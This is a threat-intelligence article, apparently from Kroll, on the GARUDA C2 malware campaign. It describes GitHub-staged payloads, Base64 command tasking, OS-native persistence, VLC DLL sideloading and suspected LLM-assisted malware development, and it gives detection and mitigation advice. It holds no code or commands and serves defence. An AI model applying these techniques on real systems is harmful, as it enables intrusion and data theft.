This article provides an overview of Kroll’s investigation of the GARUDA C2 malware. Stay tuned for our upcoming white paper which will provide a deep dive into the malware’s architecture; command and control tradecraft; observed threat actor tactics, techniques and procedures; and actionable detection and mitigation guidance.
Kroll Threat Intelligence (TI) has identified a cross-platform malware campaign leveraging public code-hosting platforms, most notably GitHub, to stage tooling and manage ongoing operations. The actor rotated between multiple accounts before ultimately removing the repository; however, Kroll preserved the tooling prior to deletion. Analysis indicates a single operator using a standardized, multi-operating system (OS) toolchain capable of targeting Windows, macOS, and Linux environments, highlighting a scalable and repeatable operational model. This framework is being tracked internally by Kroll TI as GARUDA C2.
Exposed development artifacts, such as build logs, embedded Hindi-language comments and infrastructure indicators, allow Kroll to attribute this activity with high confidence to an India-based actor. The tooling also suggests the likely use of a locally hosted LLM to accelerate malware development. The actor maintains redundancy across multiple code-hosting services to deliver payloads, exfiltrate data and distribute updated commands, reinforcing a broader trend of adversaries abusing legitimate cloud platforms for resilience and stealth.
GARUDA C2 Details
GARUDA C2 employs a consistent multistage architecture across OS. Initial downloaders retrieve secondary components that conduct host reconnaissance, exfiltrate data via hard-coded application programming interface (API) tokens, and periodically poll simple version indicators to receive updated tasking through a Base64-encoded command execution mechanism. Persistence is implemented using native OS features, including registry run keys and scheduled tasks on Windows, LaunchAgents on macOS, and systemd services on Linux.
More advanced payloads incorporate Rust-based binaries and Windows Dynamic Link Library (DLL) sideloading techniques (specifically leveraging VLC libraries) to execute and persist while deploying local command-execution frameworks and presenting decoy content to victims.
Overall, this campaign reflects a capable actor employing cross-platform malware, cloud-native infrastructure and automation-friendly tooling to sustain access and adapt operations efficiently.
Organizations should treat this activity as indicative of a broader shift toward low-cost, multi-platform malware operations. They must ensure detection and response strategies account for abuse of trusted services and native persistence mechanisms.
Observed MITRE ATT&CK Techniques
The following chart shows observed MITRE ATT&CK techniques for this malware:
Recommended Mitigation Strategies
Harden Endpoint Persistence Controls
- Monitor and Alert on Common Persistence Mechanisms:
- Windows: Registry run keys, newly created or modified scheduled tasks (especially masquerading as system updates)
- macOS: Unauthorized LaunchAgents and custom plist files in user directories
- Linux: New or modified systemd services running under nonstandard users
- Enforce least privilege and restrict system-level persistence creation to approved administrative processes only
- Disable or restrict PowerShell and Windows Script Host (WSH) (wscript.exe, cscript.exe)
- Enable DLL safe search mode
- Enable attack surface reduction (ASR) rules
Restrict Abuse of Public Code-Hosting Platforms
- Implement network and endpoint controls to inspect and log access to public repositories (GitHub, GitLab, Codeberg, Gitea, Bitbucket) from endpoints that do not require development access
- Apply application allow-listing for developer tools and repositories in non-engineering environments
- Monitor for API token usage embedded in scripts or binaries communicating directly with code-hosting services
Detect Living-Off-the-Cloud Command and Control
- Identify Abnormal Patterns where Endpoints:
- Periodically poll repositories for version checks or lightweight text files
- Retrieve Base64-encoded instructions followed by local execution
- Tune endpoint detection and response (EDR)/extended detection and response (XDR) detections for script-driven execution chains and suspicious differential update behavior outside standard software patching tools
- Enforce egress filtering where possible.
Behavior Detection
- Identify script-to-native execution chains
- Repeat host inventory collection with outbound uploads
Conclusion
LLMs have fundamentally altered the malware development landscape by enabling low-skill actors to implement advanced techniques, such as cross-platform payloads, with minimal investment. This has driven an exponential increase in malware volume and operational sophistication. In this environment, traditional analyst-centric workflows cannot scale, making LLM-assisted defensive analytics a practical requirement for modern blue teams seeking to maintain parity with increasingly automated adversaries.
